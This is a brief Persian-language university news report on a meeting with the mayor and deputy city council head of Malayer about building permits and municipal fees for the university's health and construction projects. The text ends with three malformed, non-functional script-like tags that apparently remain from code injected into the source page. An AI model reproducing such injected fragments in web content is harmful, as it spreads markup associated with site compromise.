برگزاری جلسه معاون توسعه مدیریت و منابع دانشگاه با شهردار و نایب رییس شورای شهر ملایر

جلسه مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه با شهردار و نایب رییس شورای شهر ملایر در خصوص پیگیری اخذ پروانه ساخت پروژه های عمرانی دانشگاه در شهرستان ملایر برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، به منظور پیگیری اخذ پروانه ساخت و عوارض شهرداری پروژه های عمرانی،بهداشتی و درمانی دانشگاه در شهرستان ملایر، نشستی مشترک بین معاون توسعه مدیریت و منابع دانشگاه، شهردار و نایب رییس شورای شهر ملایر با حضور مدیر شبکه بهداشت و درمان شهرستان مذکور و مهندس طاهری مدیر دفتر فنی دانشگاه برگزار شد.

در این جلسه، پیگیری مباحث اخذ پروانه پروژه های عمرانی، بهداشتی و درمانی شهرستان ملایر و تعیین و نحوه پرداخت عوارض شهرداری آن مراکز مورد بحث و بررسی قرار گرفت.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>